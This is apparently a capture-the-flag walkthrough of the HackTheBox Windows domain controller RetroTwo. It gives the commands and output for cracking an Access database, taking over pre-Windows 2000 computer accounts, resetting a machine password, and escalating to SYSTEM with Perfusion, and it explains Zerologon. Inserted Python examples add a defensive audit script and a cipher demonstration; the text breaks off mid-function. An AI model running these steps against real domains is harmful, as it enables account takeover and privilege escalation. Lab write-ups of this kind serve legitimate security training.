RetroTwo

RetroTwo starts with an open SMB share with an Access database. In a macro module attached to the DB, I’ll find a script with valid domain creds. That allows me to collect BloodHound data, where I’ll find two computers with pre-Windows 2000 weak passwords. I’ll abuse that to get access to another computer account, and then RDP. From there, I’ll find an old OS, and show two different well-known vulnerabilities to exploit it, Perfusion and Zerologon.

Box Info

Name: RetroTwo
Play on HackTheBox
Release Date: 22 Jul 2025
Retire Date: 22 Jul 2025
OS: Windows
Base Points: Easy [20]
First Blood User: N/A (non-competitive)
First Blood Root: N/A (non-competitive)
Creator: xct

Recon

Initial Scanning

nmap finds many open TCP ports:

oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.234.168
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-18 15:52 UTC
...[snip]...
Completed SYN Stealth Scan at 15:52, 13.26s elapsed (65535 total ports)
Nmap scan report for 10.129.234.168
Host is up, received echo-reply ttl 127 (0.092s latency).
Scanned at 2025-07-18 15:52:02 UTC for 13s
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
3389/tcp  open  ms-wbt-server    syn-ack ttl 127
5722/tcp  open  msdfsr           syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49154/tcp open  unknown          syn-ack ttl 127
49155/tcp open  unknown          syn-ack ttl 127
49157/tcp open  unknown          syn-ack ttl 127
49158/tcp open  unknown          syn-ack ttl 127
49165/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds
           Raw packets sent: 131058 (5.767MB) | Rcvd: 23 (996B)
oxdf@hacky$ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5722,9389 -sCV 10.129.234.168
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-18 15:53 UTC
Nmap scan report for 10.129.234.168
Host is up (0.092s latency).

PORT     STATE SERVICE            VERSION
53/tcp   open  domain             Microsoft DNS 6.1.7601 (1DB15F75) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15F75)
88/tcp   open  kerberos-sec       Microsoft Windows Kerberos (server time: 2025-07-18 16:09:37Z)
135/tcp  open  msrpc              Microsoft Windows RPC
139/tcp  open  netbios-ssn        Microsoft Windows netbios-ssn
389/tcp  open  ldap               Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds       Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp  open  tcpwrapped
593/tcp  open  ncacn_http         Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap               Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ssl/ms-wbt-server?
|_ssl-date: 2025-07-18T16:11:12+00:00; +16m04s from scanner time.
| ssl-cert: Subject: commonName=BLN01.retro2.vl
| Not valid before: 2025-03-17T09:40:28
|_Not valid after:  2025-09-16T09:40:28
5722/tcp open  msrpc              Microsoft Windows RPC
9389/tcp open  mc-nmf             .NET Message Framing
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-07-18T16:10:32
|_  start_date: 2025-07-18T16:05:11
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: BLN01
|   NetBIOS computer name: BLN01\x00
|   Domain name: retro2.vl
|   Forest name: retro2.vl
|   FQDN: BLN01.retro2.vl
|_  System time: 2025-07-18T18:10:35+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: -13m54s, deviation: 59m57s, median: 16m03s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.64 seconds

The box shows many of the ports associated with a Windows Domain Controller. The domain is retro2.vl, and the hostname is BLN01. It also identifies the OS as Server 2008 R2, which is quite old at this point.

All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.

I’ll use netexec to generate a line for my hosts file:

oxdf@hacky$ netexec smb 10.129.234.168 --generate-hosts-file hosts
SMB         10.129.234.168  445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
oxdf@hacky$ cat hosts 
10.129.234.168     BLN01.retro2.vl retro2.vl BLN01
oxdf@hacky$ cat hosts /etc/hosts | sponge /etc/hosts

SMB - TCP 445

The guest account is able to list shares on RetroTwo:

oxdf@hacky$ netexec smb BLN01.retro2.vl -u guest -p '' --shares
SMB         10.129.234.168  445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.129.234.168  445    BLN01            [+] retro2.vl\guest: 
SMB         10.129.234.168  445    BLN01            [*] Enumerated shares
SMB         10.129.234.168  445    BLN01            Share           Permissions     Remark
SMB         10.129.234.168  445    BLN01            -----           -----------     ------
SMB         10.129.234.168  445    BLN01            ADMIN$                          Remote Admin
SMB         10.129.234.168  445    BLN01            C$                              Default share
SMB         10.129.234.168  445    BLN01            IPC$                            Remote IPC
SMB         10.129.234.168  445    BLN01            NETLOGON                        Logon server share 
SMB         10.129.234.168  445    BLN01            Public          READ            
SMB         10.129.234.168  445    BLN01            SYSVOL                          Logon server share

The Public share is custom to RetroTwo (the rest are the standard DC shares). I’ll connect and find two directories:

oxdf@hacky$ smbclient -N //BLN01.retro2.vl/public
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug 17 14:30:37 2024
  ..                                  D        0  Sat Aug 17 14:30:37 2024
  DB                                  D        0  Sat Aug 17 12:07:06 2024
  Temp                                D        0  Sat Aug 17 11:58:05 2024

                6290943 blocks of size 4096. 800532 blocks available

Temp is empty, but DB has a Microsoft Access database file:

smb: \> ls DB\
  .                                   D        0  Sat Aug 17 12:07:06 2024
  ..                                  D        0  Sat Aug 17 12:07:06 2024
  staff.accdb                         A   876544  Sat Aug 17 14:30:19 2024

                6290943 blocks of size 4096. 800532 blocks available

I’ll download that file:

smb: \DB\> get staff.accdb 
getting file \DB\staff.accdb of size 876544 as staff.accdb (473.5 KiloBytes/sec) (average 306.6 KiloBytes/sec)

It is an Access database:

oxdf@hacky$ file staff.accdb 
staff.accdb: Microsoft Access Database

Auth as ldapreader

Recover Password

Trying to open the database file in Microsoft Access pops a prompt asking for a password. I’ll use office2john.py from john to get a hash from the file:

oxdf@hacky$ /opt/john/run/office2john.py staff.accdb | tee staff.accdb.hash
staff.accdb:$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235

I’ll give that to hashcat with rockyou.txt (from SecLists) and it quickly cracks the password:

$ hashcat staff.accdb.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt --user
hashcat (v6.2.6) starting in autodetect mode
...[snip]...                                                                  
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

9600 | MS Office 2013 | Document
...[snip]...
$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235:class08
...[snip]...

The password is “class08”.

Database

I spent far too long looking for a way to access this file from Linux, but eventually gave up. I’ll open the file in Access on Windows, and it asks for the password:

[Screenshot: Access prompting for the database password]

On entering the password, it loads. I haven’t activated this Office instance, so my options are limited. But I can still see one table and one Module on the left side:

[Screenshot: Access showing the StaffMembers table and the Staff module in the left pane]

The StaffMembers table seems empty. In this un-activated Access, the only option I have for the module is to export it:

[Screenshot: the export option for the module]

I’ll save it as a text file. It’s VBA code:

Attribute VB_Name = "Staff"
Option Compare Database

Sub ImportStaffUsersFromLDAP()
    Dim objConnection As Object
    Dim objCommand As Object
    Dim objRecordset As Object
    Dim strLDAP As String
    Dim strUser As String
    Dim strPassword As String
    Dim strSQL As String
    Dim db As Database
    Dim rst As Recordset
    
    strLDAP = "LDAP://OU=staff,DC=retro2,DC=vl"
    strUser = "retro2\ldapreader"
    strPassword = "ppYaVcB5R"
    
    Set objConnection = CreateObject("ADODB.Connection")
    
    objConnection.Provider = "ADsDSOObject"
    objConnection.Properties("User ID") = strUser
    objConnection.Properties("Password") = strPassword
    objConnection.Properties("Encrypt Password") = True
    objConnection.Open "Active Directory Provider"
    
    Set objCommand = CreateObject("ADODB.Command")
    objCommand.ActiveConnection = objConnection
    
    objCommand.CommandText = "<" & strLDAP & ">;(objectCategory=person);cn,distinguishedName,givenName,sn,sAMAccountName,userPrincipalName,description;subtree"
    
    Set objRecordset = objCommand.Execute
    
    Set db = CurrentDb
    Set rst = db.OpenRecordset("StaffMembers", dbOpenDynaset)
    
    Do Until objRecordset.EOF
        rst.AddNew
        rst!CN = objRecordset.Fields("cn").Value
        rst!DistinguishedName = objRecordset.Fields("distinguishedName").Value
        rst!GivenName = Nz(objRecordset.Fields("givenName").Value, "")
        rst!SN = Nz(objRecordset.Fields("sn").Value, "")
        rst!sAMAccountName = objRecordset.Fields("sAMAccountName").Value
        rst!UserPrincipalName = Nz(objRecordset.Fields("userPrincipalName").Value, "")
        rst!Description = Nz(objRecordset.Fields("description").Value, "")
        rst.Update
        
        objRecordset.MoveNext
    Loop
    
    rst.Close
    objRecordset.Close
    objConnection.Close
    Set rst = Nothing
    Set objRecordset = Nothing
    Set objCommand = Nothing
    Set objConnection = Nothing
    
    MsgBox "Staff users imported successfully!", vbInformation
End Sub

It’s code to populate the DB with staff over LDAP, and there are creds.

Validate Creds

The creds from the script work over SMB:

oxdf@hacky$ netexec smb BLN01.retro2.vl -u ldapreader -p ppYaVcB5R
SMB         10.129.234.168  445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.129.234.168  445    BLN01            [+] retro2.vl\ldapreader:ppYaVcB5R 

Auth as FS01$

Bloodhound

Collection

I’ll collect BloodHound data with both netexec and RustHound-CE. For netexec, it’s important to include -c All or it won’t collect something necessary for this box:

oxdf@hacky$ netexec ldap BLN01.retro2.vl -u ldapreader -p ppYaVcB5R --bloodhound --dns-server 10.129.234.168 -c All
LDAP        10.129.234.168  389    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 (name:BLN01) (domain:retro2.vl) (signing:None) (channel binding:No TLS cert)
LDAP        10.129.234.168  389    BLN01            [+] retro2.vl\ldapreader:ppYaVcB5R 
LDAP        10.129.234.168  389    BLN01            Resolved collection methods: localadmin, trusts, acl, psremote, objectprops, dcom, rdp, container, group, session
LDAP        10.129.234.168  389    BLN01            Done in 0M 18S
LDAP        10.129.234.168  389    BLN01            Compressing output into /home/oxdf/.nxc/logs/BLN01_10.129.234.168_2025-07-19_191250_bloodhound.zip

Rusthound completely misses the needed interaction for this box (though they are very quick to update so it’ll likely be fixed soon):

oxdf@hacky$ rusthound-ce --domain retro2.vl -u ldapreader -p ppYaVcB5R --zip
---------------------------------------------------
Initializing RustHound-CE at 14:56:16 on 07/19/25
Powered by @g0h4n_0
---------------------------------------------------

[2025-07-19T14:56:16Z INFO  rusthound_ce] Verbosity level: Info
[2025-07-19T14:56:16Z INFO  rusthound_ce] Collection method: All
[2025-07-19T14:56:17Z INFO  rusthound_ce::ldap] Connected to RETRO2.VL Active Directory!
[2025-07-19T14:56:17Z INFO  rusthound_ce::ldap] Starting data collection...
[2025-07-19T14:56:17Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-07-19T14:56:18Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=retro2,DC=vl
[2025-07-19T14:56:18Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-07-19T14:56:19Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=retro2,DC=vl
[2025-07-19T14:56:19Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-07-19T14:56:20Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=retro2,DC=vl
[2025-07-19T14:56:20Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-07-19T14:56:21Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=retro2,DC=vl
[2025-07-19T14:56:21Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-07-19T14:56:21Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=retro2,DC=vl
[2025-07-19T14:56:21Z INFO  rusthound_ce::api] Starting the LDAP objects parsing...
[2025-07-19T14:56:21Z INFO  rusthound_ce::objects::domain] MachineAccountQuota: 10
[2025-07-19T14:56:21Z INFO  rusthound_ce::api] Parsing LDAP objects finished!
[2025-07-19T14:56:21Z INFO  rusthound_ce::json::checker] Starting checker to replace some values...
[2025-07-19T14:56:21Z INFO  rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-07-19T14:56:21Z INFO  rusthound_ce::json::maker::common] 27 users parsed!
[2025-07-19T14:56:21Z INFO  rusthound_ce::json::maker::common] 51 groups parsed!
[2025-07-19T14:56:21Z INFO  rusthound_ce::json::maker::common] 4 computers parsed!
[2025-07-19T14:56:21Z INFO  rusthound_ce::json::maker::common] 2 ous parsed!
[2025-07-19T14:56:21Z INFO  rusthound_ce::json::maker::common] 3 domains parsed!
[2025-07-19T14:56:21Z INFO  rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-07-19T14:56:21Z INFO  rusthound_ce::json::maker::common] 67 containers parsed!
[2025-07-19T14:56:21Z INFO  rusthound_ce::json::maker::common] .//20250719145621_retro2-vl_rusthound-ce.zip created!

RustHound-CE Enumeration Completed at 14:56:21 on 07/19/25! Happy Graphing!

ldapreader

I’ll load both zip archives into the BloodHound CE docker instance and start by marking ldapreader as owned:

[Screenshot: ldapreader marked as owned in BloodHound]

Unfortunately, this account doesn’t have any outbound control or anything interesting as far as memberships:

[Screenshot: ldapreader has no outbound object control and no interesting group memberships]

Computers

There are three members of the Domain Computers group:

[Screenshot: members of the Domain Computers group]

Pre-Windows 2000 Compatibility

Especially given the name of the box and the vulnerability in the previous Retro box, it’s worth checking for Pre-Windows 2000 compatibility with the computer accounts. netexec shows four computer accounts:

oxdf@hacky$ netexec ldap BLN01.retro2.vl -u ldapreader -p ppYaVcB5R --computers
LDAP        10.129.234.168  389    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 (name:BLN01) (domain:retro2.vl) (signing:None) (channel binding:No TLS cert)
LDAP        10.129.234.168  389    BLN01            [+] retro2.vl\ldapreader:ppYaVcB5R 
LDAP        10.129.234.168  389    BLN01            [*] Total records returned: 4
LDAP        10.129.234.168  389    BLN01            BLN01$
LDAP        10.129.234.168  389    BLN01            ADMWS01$
LDAP        10.129.234.168  389    BLN01            FS01$
LDAP        10.129.234.168  389    BLN01            FS02$

I’ll create a list of computer names, and from it a list of passwords in lowercase without the “$”:

oxdf@hacky$ cat computers | tr -d '$' | tr '[:upper:]' '[:lower:]' | tee pre2000-passwords
bln01
admws01
fs01
fs02

Now running these lists through netexec shows two that fail with STATUS_LOGON_FAILURE, and two that have STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT:

oxdf@hacky$ netexec smb BLN01.retro2.vl -u computers -p pre2000-passwords --no-bruteforce --continue-on-success 
SMB         10.129.234.168  445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.129.234.168  445    BLN01            [-] retro2.vl\BLN01$:bln01 STATUS_LOGON_FAILURE 
SMB         10.129.234.168  445    BLN01            [-] retro2.vl\ADMWS01$:admws01 STATUS_LOGON_FAILURE 
SMB         10.129.234.168  445    BLN01            [-] retro2.vl\FS01$:fs01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT 
SMB         10.129.234.168  445    BLN01            [-] retro2.vl\FS02$:fs02 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT is common in this situation where the password has not been used yet. The original Diving into Pre-Created Computer Accounts post from TrustedSec suggests changing the password. But I can also just add -k to use Kerberos auth:

oxdf@hacky$ netexec smb BLN01.retro2.vl -u computers -p pre2000-passwords --no-bruteforce --continue-on-success -k
SMB         BLN01.retro2.vl 445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         BLN01.retro2.vl 445    BLN01            [-] retro2.vl\BLN01$:bln01 KDC_ERR_PREAUTH_FAILED 
SMB         BLN01.retro2.vl 445    BLN01            [-] retro2.vl\ADMWS01$:admws01 KDC_ERR_PREAUTH_FAILED 
SMB         BLN01.retro2.vl 445    BLN01            [+] retro2.vl\FS01$:fs01 
SMB         BLN01.retro2.vl 445    BLN01            [+] retro2.vl\FS02$:fs02 

The creds for both FS01$ and FS02$ work!
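The check above is the attacker's view of pre-created computer accounts. As an added example (not code from the post, netexec, or TrustedSec), here is the defender's side of the same finding in Python: an audit over LDAP computer objects that flags accounts still carrying the PASSWD_NOTREQD flag that the "Assign this computer account as a pre-Windows 2000 computer" option sets (userAccountControl 4128 per the TrustedSec research the post cites), and derives the default password the same way the tr pipeline above does. The entries are constructed sample data modelled on the four accounts netexec listed; their userAccountControl and logonCount values are assumptions for the example.

```python
"""Audit computer accounts for pre-Windows 2000 default passwords.

Added example for this write-up; not code from the post or from netexec.
The LDAP entries below are constructed sample data modelled on the four
accounts the post enumerates, with illustrative userAccountControl values.
Attribute semantics follow TrustedSec's "Diving into Pre-Created Computer
Accounts": an account pre-created with "Assign this computer account as a
pre-Windows 2000 computer" has PASSWD_NOTREQD set alongside
WORKSTATION_TRUST_ACCOUNT (userAccountControl 4128), and its initial
password is the lowercase computer name without the trailing "$".
"""

# userAccountControl bits (Microsoft-documented values)
PASSWD_NOTREQD = 0x0020
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000          # domain controllers
TRUSTED_FOR_DELEGATION = 0x80000

# LDAP bitwise-AND matching rule (OID 1.2.840.113556.1.4.803): this filter
# finds computer objects that still carry PASSWD_NOTREQD and can be handed
# to ldapsearch against a real DC to reproduce the audit.
AUDIT_LDAP_FILTER = (
    "(&(objectClass=computer)"
    "(userAccountControl:1.2.840.113556.1.4.803:=32))"
)

# Constructed sample directory (assumption: FS01$/FS02$ are pre-created).
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "BLN01$",
     "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "logonCount": 512},
    {"sAMAccountName": "ADMWS01$",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
     "logonCount": 17},
    {"sAMAccountName": "FS01$",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD,
     "logonCount": 0},
    {"sAMAccountName": "FS02$",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD,
     "logonCount": 0},
]


def default_pre2000_password(sam_account_name: str) -> str:
    """Password Windows assigns to a pre-created computer account; the same
    transform as the post's `tr -d '$' | tr '[:upper:]' '[:lower:]'`."""
    return sam_account_name.rstrip("$").lower()


def is_computer_account(uac: int) -> bool:
    return bool(uac & (WORKSTATION_TRUST_ACCOUNT | SERVER_TRUST_ACCOUNT))


def find_pre2000_candidates(entries):
    """Return [(sAMAccountName, default_password, never_logged_on)] for
    computer accounts that still have PASSWD_NOTREQD set.

    never_logged_on (logonCount == 0) is only a heuristic for the state the
    post sees as STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT: a password that
    is correct but has not been used by a joined machine yet.
    """
    found = []
    for entry in entries:
        uac = int(entry["userAccountControl"])
        if not is_computer_account(uac) or not uac & PASSWD_NOTREQD:
            continue
        name = entry["sAMAccountName"]
        found.append((name, default_pre2000_password(name),
                      int(entry.get("logonCount", 0)) == 0))
    return found


def report(entries) -> str:
    """Summary for an admin: which accounts to reset or remove."""
    lines = [f"LDAP filter to reproduce: {AUDIT_LDAP_FILTER}"]
    for name, pw, unused in find_pre2000_candidates(entries):
        state = "never used" if unused else "in use"
        lines.append(f"{name}: PASSWD_NOTREQD set, default password would be "
                     f"'{pw}' ({state}); reset the account or remove it")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_COMPUTERS))
```

Run against a real directory, the filter in AUDIT_LDAP_FILTER is the part to reuse; the fix for anything it returns is the one the TrustedSec post describes, resetting the account's password (or deleting accounts that never joined).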

RDP as ldapreader

Enumeration

It seems that members of the Domain Computers group have GenericWrite over other members of the same group:

[Screenshot: GenericWrite edges between members of Domain Computers]

ADMWS01 shows some additional outbound control:

[Screenshot: ADMWS01$ outbound object control]

If I use the prebuilt “Shortest paths from Owned objects”, it shows a path from FS01$ through ADMWS01$ to add members to the Services group which is a member of the Remote Desktop Users group:

[Screenshot: shortest path from FS01$ through ADMWS01$ to the Services group and on to Remote Desktop Users]

Reset ADMWS01$ Password

To avoid having to change the password on FS01$, I’ll get a TGT using netexec:

oxdf@hacky$ netexec smb BLN01.retro2.vl -u 'FS01$' -p fs01 -k --generate-tgt FS01
SMB         BLN01.retro2.vl 445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         BLN01.retro2.vl 445    BLN01            [+] retro2.vl\FS01$:fs01 
SMB         BLN01.retro2.vl 445    BLN01            [+] TGT saved to: FS01.ccache
SMB         BLN01.retro2.vl 445    BLN01            [+] Run the following command to use the TGT: export KRB5CCNAME=FS01.ccache

That allows me to change the computer password using addcomputer.py from Impacket with the -no-add option to just change the password:

oxdf@hacky$ KRB5CCNAME=FS01.ccache addcomputer.py -computer-name 'ADMWS01$' -computer-pass '0xdf0xdf' -no-add -k -no-pass -dc-host BLN01.retro2.vl 'retro2.vl/FS01$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully set password of ADMWS01$ to 0xdf0xdf.

It works:

oxdf@hacky$ netexec smb BLN01.retro2.vl -u 'ADMWS01$' -p 0xdf0xdf
SMB         10.129.234.168  445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.129.234.168  445    BLN01            [+] retro2.vl\ADMWS01$:0xdf0xdf 

RDP

With access to ADMWS01$, I can add members to the Services group. I’ll use BloodyAD:

oxdf@hacky$ bloodyAD --host BLN01.retro2.vl -d retro2.vl -u 'ADMWS01$' -p 0xdf0xdf add groupMember Services ldapreader
[+] ldapreader added to Services

Now I’ll connect to remote desktop (RDP) using xfreerdp /u:ldapreader /p:ppYaVcB5R /v:BLN01.retro2.vl /tls-seclevel:0:

[Screenshot: RDP session on BLN01 as ldapreader]

user.txt is at the root of the C: drive:

[Screenshot: user.txt at the root of C:\]

I’ll grab it:

[Screenshot: contents of user.txt]

Shell as System / Administrator

Enumeration

The host is running Windows 2008 R2 as expected from nmap:

PS C:\> systeminfo

Host Name:                 BLN01
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                55041-402-3582622-84981
Original Install Date:     8/17/2024, 10:41:46 AM
System Boot Time:          7/18/2025, 6:04:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna
Total Physical Memory:     4,095 MB
Available Physical Memory: 3,040 MB
Virtual Memory: Max Size:  8,189 MB
Virtual Memory: Available: 7,100 MB
Virtual Memory: In Use:    1,089 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    retro2.vl
Logon Server:              \\BLN01
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 5
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.129.0.1
                                 IP address(es)
                                 [01]: 10.129.234.168
                                 [02]: fe80::2122:e847:ed0d:a323
                                 [03]: dead:beef::2122:e847:ed0d:a323

There are probably many ways to exploit an OS this old. I’ll show two.

Perfusion

Background

The intended path for this machine is to use Perfusion, an exploit released in 2021 by itm4n, accompanied by a blog post, An Unconventional Exploit for the RpcEptMapper Registry Key Vulnerability.

The issue is the permissions on a registry key that has to do with performance counters on the machine. Any user can write to this key, and any user can then query the performance counters, which can lead to a DLL specified in that key being loaded as NT Authority\System.

The author made an exploit that handles all of this. It creates a suspended process, writes the DLL, writes the reg key, queries the WMI class Win32_Perf to trigger the DLL load, gets the process token for NT Authority\System, and duplicates it into the suspended process.

Compile

The GitHub repo doesn’t have a compiled binary, so I’ll have to take care of that. I’ll download the repo to my Windows VM and open the .sln file in Visual Studio. I did have to allow VS to upgrade to the current versions of the runtime on my VM, but then it built just fine from Build -> Build Solution. Before doing that, I make sure to switch the configuration from Debug to Release.

[Screenshot: Visual Studio with the configuration set to Release]

I’ll copy the resulting Perfusion.exe back to my Linux VM. There I can copy it from the file explorer and paste it onto the Desktop of RetroTwo.

Exploit

Now I’ll run the exploit to get a shell as System:

PS C:\Users\ldapreader\Desktop> .\Perfusion.exe -c cmd -i
[*] Created Performance DLL: C:\Users\LDAPRE~1\AppData\Local\Temp\2\performance_2896_740_2.dll
[*] Created Performance registry key.
[*] Triggered Performance data collection.
[+] Exploit completed. Got a SYSTEM token! :)
[*] Waiting for the Trigger Thread to terminate... OK
[!] Failed to delete Performance registry key.
[*] Deleted Performance DLL.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\ldapreader\Desktop>whoami
nt authority\system

With this shell I’ll grab root.txt:

C:\Users\administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 98B0-04D7

 Directory of C:\Users\administrator\Desktop

08/17/2024  04:17 PM    <DIR>          .
08/17/2024  04:17 PM    <DIR>          ..
04/11/2025  01:00 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   3,217,920,000 bytes free

C:\Users\administrator\Desktop>type root.txt
cb462daa************************

Zerologon

Background

In September 2020, Secura released a paper titled Zerologon outlining the research that led to CVE-2020-1472. The vulnerability is in the cryptographic implementation used in the Netlogon authentication process, and effectively allowed any user to authenticate as any user. The issue has to do with how the code used a fixed initialization vector (IV) of all zeros, which allows the attacker to spoof the credential check, typically in fewer than 256 attempts.
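To make the "fewer than 256 attempts" concrete, here is an added Python example (not from the post or from Secura) of the mode-of-operation flaw itself. Per Secura's paper, Netlogon computes the credential with AES-CFB8 under a fixed all-zero IV; the argument below does not depend on the cipher, only on the mode, so the block function is a stand-in keyed PRF built from SHA-256 rather than AES (an assumption of this example, stated in the code). With a zero IV and a zero plaintext, the whole CFB8 output is zero whenever the first byte of E_K(0) is zero, which is true for roughly 1 in 256 keys; the same functions show that a random IV removes that property.

```python
"""Why an all-zero IV breaks CFB8 authentication (Zerologon, CVE-2020-1472).

Added example for this write-up, not code from the post or from Secura.
ASSUMPTION: the block function is a SHA-256 based stand-in, NOT AES. The
weakness is in the CFB8 mode with a fixed zero IV, so any 16-byte keyed
block function shows the same 1-in-256 behaviour.
"""
import hashlib

BLOCK = 16
CREDENTIAL_LEN = 8  # Netlogon credentials are 8 bytes


def stand_in_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Toy 16-byte keyed block function (stand-in for AES, see header)."""
    assert len(block) == BLOCK
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes,
                 block_encrypt=stand_in_block_encrypt) -> bytes:
    """Generic CFB8: each plaintext byte is XORed with the first byte of
    E_K(shift register); the resulting ciphertext byte is shifted in.
    If iv and plaintext are all zero and E_K(0)[0] == 0, the register never
    changes and every output byte is zero."""
    reg = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream_byte = block_encrypt(key, bytes(reg))[0]
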